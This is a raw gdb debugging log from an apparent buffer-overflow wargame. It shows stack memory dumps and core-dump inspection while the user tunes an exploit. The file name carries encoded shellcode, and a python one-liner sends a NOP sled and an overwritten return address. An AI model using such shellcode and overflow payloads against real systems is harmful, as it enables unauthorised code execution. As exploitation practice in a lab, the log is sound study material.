0xbffffabc:	0x00000008	0x00000000	0x00000009	0x08048450
0xbffffacc:	0x0000000b	0x000001fa	0x0000000c	0x000001fa
0xbffffadc:	0x0000000d	0x000001fa	0x0000000e	0x000001fa
0xbffffaec:	0x00000010	0x0fabfbff	0x0000000f	0xbffffb2f
0xbffffafc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100 $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfbfbfbf	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24	0xbffffc31	0xbffffdf4
0xbffffa4c:	0xbffffe13	0xbffffe30	0xbffffe45	0xbffffe64
0xbffffa5c:	0xbffffe6f	0xbffffe89	0xbffffe99	0xbffffea1
0xbffffa6c:	0xbffffeab	0xbffffebb	0xbffffec9	0xbffffed7
0xbffffa7c:	0xbffffee8	0xbffffef3	0xbfffff06	0xbfffff49
0xbffffa8c:	0xbfffff99	0x00000000	0x00000003	0x08048034
0xbffffa9c:	0x00000004	0x00000020	0x00000005	0x00000006
0xbffffaac:	0x00000006	0x00001000	0x00000007	0x40000000
0xbffffabc:	0x00000008	0x00000000	0x00000009	0x08048450
0xbffffacc:	0x0000000b	0x000001fa	0x0000000c	0x000001fa
0xbffffadc:	0x0000000d	0x000001fa	0x0000000e	0x000001fa
0xbffffaec:	0x00000010	0x0fabfbff	0x0000000f	0xbffffb2f
0xbffffafc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100 $esp    
0xbffff9e0:	0x00000000	0xbffffa24	0xbffffa30	0x40013868
0xbffff9f0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa00:	0x08048500	0x00000002	0xbffffa24	0x08048390
0xbffffa10:	0x0804866c	0x4000ae60	0xbffffa1c	0x40013e90
0xbffffa20:	0x00000002	0xbffffb34	0xbffffb82	0x00000000
0xbffffa30:	0xbffffbb3	0xbffffbca	0xbffffbe3	0xbffffc02
0xbffffa40:	0xbffffc24	0xbffffc31	0xbffffdf4	0xbffffe13
0xbffffa50:	0xbffffe30	0xbffffe45	0xbffffe64	0xbffffe6f
0xbffffa60:	0xbffffe89	0xbffffe99	0xbffffea1	0xbffffeab
0xbffffa70:	0xbffffebb	0xbffffec9	0xbffffed7	0xbffffee8
0xbffffa80:	0xbffffef3	0xbfffff06	0xbfffff49	0xbfffff99
0xbffffa90:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaa0:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffab0:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffac0:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffad0:	0x000001fa	0x0000000c	0x000001fa	0x0000000d
0xbffffae0:	0x000001fa	0x0000000e	0x000001fa	0x00000010
0xbffffaf0:	0x0fabfbff	0x0000000f	0xbffffb2f	0x00000000
0xbffffb00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb20:	0x00000000	0x00000000	0x00000000	0x69000000
0xbffffb30:	0x00363836	0x61612f2e	0x11eb6161	0xb1c9315e
0xbffffb40:	0x0e6c8032	0xe98001ff	0xebf67501	0xffeae805
0xbffffb50:	0xc132ffff	0x30306951	0x30696974	0x8a6f6a63
0xbffffb60:	0x8a5451e4	0x0cb19ae2	0x616181ce	0x61616161
(gdb) 
0xbffffb70:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb80:	0x90900061	0x90909090	0x90909090	0x90909090
0xbffffb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffba0:	0x90909090	0x90909090	0x90909090	0xbfbf9090
0xbffffbb0:	0x0000bfbf	0x00000000	0x00000000	0x00000000
0xbffffbc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[darkelf@localhost temp]$ ./aaaaꝑ^1ɱ2l^Nÿ^A蝁uꝅ髿ÿÿ2i00tii0cjo㐔⚱^L΁aaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44+"\xCC\xBB\xAA\xbf"'`
̻ª¿
Segmentation fault (core dumped)
[darkelf@localhost temp]$ gdb -q -c core
Core was generated by `./aaaa鐞1ɱ2lÿ瀵쩪ÿÿÿ2i00tii0cjo㐔⚱
                                                        ΁aaaaaaaaaaaaaaaaaaaaaaa '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfaabbcc in ?? ()
(gdb) x/50b $esp
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) 
0xbffffa12:	0x04	0x08	0x60	0xae	0x00	0x40	0x1c	0xfa
0xbffffa1a:	0xff	0xbf	0x90	0x3e	0x01	0x40	0x02	0x00
0xbffffa22:	0x00	0x00	0x34	0xfb	0xff	0xbf	0x82	0xfb
0xbffffa2a:	0xff	0xbf	0x00	0x00	0x00	0x00	0xb3	0xfb
0xbffffa32:	0xff	0xbf	0xca	0xfb	0xff	0xbf	0xe3	0xfb
0xbffffa3a:	0xff	0xbf	0x02	0xfc	0xff	0xbf	0x24	0xfc
0xbffffa42:	0xff	0xbf
(gdb) 
0xbffffa44:	0x31	0xfc	0xff	0xbf	0xf4	0xfd	0xff	0xbf
0xbffffa4c:	0x13	0xfe	0xff	0xbf	0x30	0xfe	0xff	0xbf
0xbffffa54:	0x45	0xfe	0xff	0xbf	0x64	0xfe	0xff	0xbf
0xbffffa5c:	0x6f	0xfe	0xff	0xbf	0x89	0xfe	0xff	0xbf
0xbffffa64:	0x99	0xfe	0xff	0xbf	0xa1	0xfe	0xff	0xbf
0xbffffa6c:	0xab	0xfe	0xff	0xbf	0xbb	0xfe	0xff	0xbf
0xbffffa74:	0xc9	0xfe
(gdb) 
0xbffffa76:	0xff	0xbf	0xd7	0xfe	0xff	0xbf	0xe8	0xfe
0xbffffa7e:	0xff	0xbf	0xf3	0xfe	0xff	0xbf	0x06	0xff
0xbffffa86:	0xff	0xbf	0x49	0xff	0xff	0xbf	0x99	0xff
0xbffffa8e:	0xff	0xbf	0x00	0x00	0x00	0x00	0x03	0x00
0xbffffa96:	0x00	0x00	0x34	0x80	0x04	0x08	0x04	0x00
0xbffffa9e:	0x00	0x00	0x20	0x00	0x00	0x00	0x05	0x00
0xbffffaa6:	0x00	0x00
(gdb) x/50b $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) 
0xbffff9ae:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9b6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9be:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9c6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9ce:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9d6:	0x00	0x00	0x90	0x90	0x90	0x90	0xcc	0xbb
0xbffff9de:	0xaa	0xbf
(gdb) 
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) x/50x $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) x/50x $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) x/50 $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) x/50s $esp-100
0xbffff97c:	 " ؜005@001@\234\006@\200i\020@`®"
0xbffff993:	 "@$ٹÿ¿9\206\004\b°
0xbffff9a5:	 ""
0xbffff9a6:	 ""
0xbffff9a7:	 ""
0xbffff9a8:	 "("
0xbffff9aa:	 ""
0xbffff9ab:	 ""
0xbffff9ac:	 "\030"
0xbffff9ae:	 ""
0xbffff9af:	 ""
0xbffff9b0:	 ""
0xbffff9b1:	 ""
0xbffff9b2:	 ""
0xbffff9b3:	 ""
0xbffff9b4:	 ""
0xbffff9b5:	 ""
0xbffff9b6:	 ""
0xbffff9b7:	 ""
0xbffff9b8:	 ""
0xbffff9b9:	 ""
0xbffff9ba:	 ""
0xbffff9bb:	 ""
0xbffff9bc:	 ""
0xbffff9bd:	 ""
0xbffff9be:	 ""
0xbffff9bf:	 ""
0xbffff9c0:	 ""
0xbffff9c1:	 ""
0xbffff9c2:	 ""
0xbffff9c3:	 ""
0xbffff9c4:	 ""
0xbffff9c5:	 ""
0xbffff9c6:	 ""
0xbffff9c7:	 ""
0xbffff9c8:	 ""
0xbffff9c9:	 ""
0xbffff9ca:	 ""
---Type <return> to continue, or q <return> to quit---x/50s $esp-100
0xbffff9cb:	 ""
0xbffff9cc:	 ""
0xbffff9cd:	 ""
0xbffff9ce:	 ""
0xbffff9cf:	 ""
0xbffff9d0:	 ""
0xbffff9d1:	 ""
0xbffff9d2:	 ""
0xbffff9d3:	 ""
0xbffff9d4:	 ""
0xbffff9d5:	 ""
0xbffff9d6:	 ""
(gdb) q
[darkelf@localhost temp]$ gdb -q -c core
Core was generated by `./aaaa鐞1ɱ2lÿ瀵쩪ÿÿÿ2i00tii0cjo㐔⚱
                                                        ΁aaaaaaaaaaaaaaaaaaaaaaa '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfaabbcc in ?? ()
(gdb) x/50x  
0x0:	Cannot access memory at address 0x0
(gdb) x/50 $esp
0xbffff9e0:	0x00000000	0xbffffa24	0xbffffa30	0x40013868
0xbffff9f0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa00:	0x08048500	0x00000002	0xbffffa24	0x08048390
0xbffffa10:	0x0804866c	0x4000ae60	0xbffffa1c	0x40013e90
0xbffffa20:	0x00000002	0xbffffb34	0xbffffb82	0x00000000
0xbffffa30:	0xbffffbb3	0xbffffbca	0xbffffbe3	0xbffffc02
0xbffffa40:	0xbffffc24	0xbffffc31	0xbffffdf4	0xbffffe13
0xbffffa50:	0xbffffe30	0xbffffe45	0xbffffe64	0xbffffe6f
0xbffffa60:	0xbffffe89	0xbffffe99	0xbffffea1	0xbffffeab
0xbffffa70:	0xbffffebb	0xbffffec9	0xbffffed7	0xbffffee8
0xbffffa80:	0xbffffef3	0xbfffff06	0xbfffff49	0xbfffff99
0xbffffa90:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaa0:	0x00000020	0x00000005
(gdb) x/50x $esp
0xbffff9e0:	0x00000000	0xbffffa24	0xbffffa30	0x40013868
0xbffff9f0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa00:	0x08048500	0x00000002	0xbffffa24	0x08048390
0xbffffa10:	0x0804866c	0x4000ae60	0xbffffa1c	0x40013e90
0xbffffa20:	0x00000002	0xbffffb34	0xbffffb82	0x00000000
0xbffffa30:	0xbffffbb3	0xbffffbca	0xbffffbe3	0xbffffc02
0xbffffa40:	0xbffffc24	0xbffffc31	0xbffffdf4	0xbffffe13
0xbffffa50:	0xbffffe30	0xbffffe45	0xbffffe64	0xbffffe6f
0xbffffa60:	0xbffffe89	0xbffffe99	0xbffffea1	0xbffffeab
0xbffffa70:	0xbffffebb	0xbffffec9	0xbffffed7	0xbffffee8
0xbffffa80:	0xbffffef3	0xbfffff06	0xbfffff49	0xbfffff99
0xbffffa90:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaa0:	0x00000020	0x00000005
(gdb) x/50b $esp
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) x/50x $esp
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) x/50wx $esp
0xbffff9e0:	0x00000000	0xbffffa24	0xbffffa30	0x40013868
0xbffff9f0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffa00:	0x08048500	0x00000002	0xbffffa24	0x08048390
0xbffffa10:	0x0804866c	0x4000ae60	0xbffffa1c	0x40013e90
0xbffffa20:	0x00000002	0xbffffb34	0xbffffb82	0x00000000
0xbffffa30:	0xbffffbb3	0xbffffbca	0xbffffbe3	0xbffffc02
0xbffffa40:	0xbffffc24	0xbffffc31	0xbffffdf4	0xbffffe13
0xbffffa50:	0xbffffe30	0xbffffe45	0xbffffe64	0xbffffe6f
0xbffffa60:	0xbffffe89	0xbffffe99	0xbffffea1	0xbffffeab
0xbffffa70:	0xbffffebb	0xbffffec9	0xbffffed7	0xbffffee8
0xbffffa80:	0xbffffef3	0xbfffff06	0xbfffff49	0xbfffff99
0xbffffa90:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffaa0:	0x00000020	0x00000005
(gdb) x/50wx $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfaabbcc	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24
(gdb) 
0xbffffa44:	0xbffffc31	0xbffffdf4	0xbffffe13	0xbffffe30
0xbffffa54:	0xbffffe45	0xbffffe64	0xbffffe6f	0xbffffe89
0xbffffa64:	0xbffffe99	0xbffffea1	0xbffffeab	0xbffffebb
0xbffffa74:	0xbffffec9	0xbffffed7	0xbffffee8	0xbffffef3
0xbffffa84:	0xbfffff06	0xbfffff49	0xbfffff99	0x00000000
0xbffffa94:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffaa4:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffab4:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffac4:	0x00000009	0x08048450	0x0000000b	0x000001fa
0xbffffad4:	0x0000000c	0x000001fa	0x0000000d	0x000001fa
0xbffffae4:	0x0000000e	0x000001fa	0x00000010	0x0fabfbff
0xbffffaf4:	0x0000000f	0xbffffb2f	0x00000000	0x00000000
0xbffffb04:	0x00000000	0x00000000
(gdb) 
0xbffffb0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb2c:	0x69000000	0x00363836	0x61612f2e	0x11eb6161
0xbffffb3c:	0xb1c9315e	0x0e6c8032	0xe98001ff	0xebf67501
0xbffffb4c:	0xffeae805	0xc132ffff	0x30306951	0x30696974
0xbffffb5c:	0x8a6f6a63	0x8a5451e4	0x0cb19ae2	0x616181ce
0xbffffb6c:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb7c:	0x61616161	0x90900061	0x90909090	0x90909090
0xbffffb8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbac:	0xbbcc9090	0x0000bfaa	0x00000000	0x00000000
0xbffffbbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbcc:	0x00000000	0x00000000
(gdb) 
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc94:	0x00000000	0x00000000
(gdb) 
0xbffffc9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffccc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd5c:	0x00000000	0x00000000
(gdb) x/50wx $esp-100
0xbffff97c:	0x4005d920	0x400143e0	0xbffff99c	0x40066070
0xbffff98c:	0x40106980	0x4000ae60	0xbffffa24	0xbffff9d8
0xbffff99c:	0x08048639	0xbffff9b0	0x00000000	0x00000028
0xbffff9ac:	0x00000018	0x00000000	0x00000000	0x00000000
0xbffff9bc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff9cc:	0x00000000	0x00000000	0x00000000	0x90909090
0xbffff9dc:	0xbfaabbcc	0x00000000	0xbffffa24	0xbffffa30
0xbffff9ec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffff9fc:	0x08048471	0x08048500	0x00000002	0xbffffa24
0xbffffa0c:	0x08048390	0x0804866c	0x4000ae60	0xbffffa1c
0xbffffa1c:	0x40013e90	0x00000002	0xbffffb34	0xbffffb82
0xbffffa2c:	0x00000000	0xbffffbb3	0xbffffbca	0xbffffbe3
0xbffffa3c:	0xbffffc02	0xbffffc24
(gdb) 
0xbffffa44:	0xbffffc31	0xbffffdf4	0xbffffe13	0xbffffe30
0xbffffa54:	0xbffffe45	0xbffffe64	0xbffffe6f	0xbffffe89
0xbffffa64:	0xbffffe99	0xbffffea1	0xbffffeab	0xbffffebb
0xbffffa74:	0xbffffec9	0xbffffed7	0xbffffee8	0xbffffef3
0xbffffa84:	0xbfffff06	0xbfffff49	0xbfffff99	0x00000000
0xbffffa94:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffaa4:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffab4:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffac4:	0x00000009	0x08048450	0x0000000b	0x000001fa
0xbffffad4:	0x0000000c	0x000001fa	0x0000000d	0x000001fa
0xbffffae4:	0x0000000e	0x000001fa	0x00000010	0x0fabfbff
0xbffffaf4:	0x0000000f	0xbffffb2f	0x00000000	0x00000000
0xbffffb04:	0x00000000	0x00000000
(gdb) 
0xbffffb0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb2c:	0x69000000	0x00363836	0x61612f2e	0x11eb6161
0xbffffb3c:	0xb1c9315e	0x0e6c8032	0xe98001ff	0xebf67501
0xbffffb4c:	0xffeae805	0xc132ffff	0x30306951	0x30696974
0xbffffb5c:	0x8a6f6a63	0x8a5451e4	0x0cb19ae2	0x616181ce
0xbffffb6c:	0x61616161	0x61616161	0x61616161	0x61616161
0xbffffb7c:	0x61616161	0x90900061	0x90909090	0x90909090
0xbffffb8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffbac:	0xbbcc9090	0x0000bfaa	0x00000000	0x00000000
0xbffffbbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbcc:	0x00000000	0x00000000
(gdb) x/50bx $esp-100
0xbffff97c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffff984:	0x9c	0xf9	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffff98c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffff994:	0x24	0xfa	0xff	0xbf	0xd8	0xf9	0xff	0xbf
0xbffff99c:	0x39	0x86	0x04	0x08	0xb0	0xf9	0xff	0xbf
0xbffff9a4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffff9ac:	0x18	0x00
(gdb) 
0xbffff9ae:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9b6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9be:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9c6:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9ce:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffff9d6:	0x00	0x00	0x90	0x90	0x90	0x90	0xcc	0xbb
0xbffff9de:	0xaa	0xbf
(gdb) 
0xbffff9e0:	0x00	0x00	0x00	0x00	0x24	0xfa	0xff	0xbf
0xbffff9e8:	0x30	0xfa	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffff9f0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffff9f8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffa00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffa08:	0x24	0xfa	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffa10:	0x6c	0x86
(gdb) 
0xbffffa12:	0x04	0x08	0x60	0xae	0x00	0x40	0x1c	0xfa
0xbffffa1a:	0xff	0xbf	0x90	0x3e	0x01	0x40	0x02	0x00
0xbffffa22:	0x00	0x00	0x34	0xfb	0xff	0xbf	0x82	0xfb
0xbffffa2a:	0xff	0xbf	0x00	0x00	0x00	0x00	0xb3	0xfb
0xbffffa32:	0xff	0xbf	0xca	0xfb	0xff	0xbf	0xe3	0xfb
0xbffffa3a:	0xff	0xbf	0x02	0xfc	0xff	0xbf	0x24	0xfc
0xbffffa42:	0xff	0xbf
(gdb) 
0xbffffa44:	0x31	0xfc	0xff	0xbf	0xf4	0xfd	0xff	0xbf
0xbffffa4c:	0x13	0xfe	0xff	0xbf	0x30	0xfe	0xff	0xbf
0xbffffa54:	0x45	0xfe	0xff	0xbf	0x64	0xfe	0xff	0xbf
0xbffffa5c:	0x6f	0xfe	0xff	0xbf	0x89	0xfe	0xff	0xbf
0xbffffa64:	0x99	0xfe	0xff	0xbf	0xa1	0xfe	0xff	0xbf
0xbffffa6c:	0xab	0xfe	0xff	0xbf	0xbb	0xfe	0xff	0xbf
0xbffffa74:	0xc9	0xfe
(gdb) 
0xbffffa76:	0xff	0xbf	0xd7	0xfe	0xff	0xbf	0xe8	0xfe
0xbffffa7e:	0xff	0xbf	0xf3	0xfe	0xff	0xbf	0x06	0xff
0xbffffa86:	0xff	0xbf	0x49	0xff	0xff	0xbf	0x99	0xff
0xbffffa8e:	0xff	0xbf	0x00	0x00	0x00	0x00	0x03	0x00
0xbffffa96:	0x00	0x00	0x34	0x80	0x04	0x08	0x04	0x00
0xbffffa9e:	0x00	0x00	0x20	0x00	0x00	0x00	0x05	0x00
0xbffffaa6:	0x00	0x00
(gdb) 
0xbffffaa8:	0x06	0x00	0x00	0x00	0x06	0x00	0x00	0x00
0xbffffab0:	0x00	0x10	0x00	0x00	0x07	0x00	0x00	0x00
0xbffffab8:	0x00	0x00	0x00	0x40	0x08	0x00	0x00	0x00
0xbffffac0:	0x00	0x00	0x00	0x00	0x09	0x00	0x00	0x00
0xbffffac8:	0x50	0x84	0x04	0x08	0x0b	0x00	0x00	0x00
0xbffffad0:	0xfa	0x01	0x00	0x00	0x0c	0x00	0x00	0x00
0xbffffad8:	0xfa	0x01
(gdb) 
0xbffffada:	0x00	0x00	0x0d	0x00	0x00	0x00	0xfa	0x01
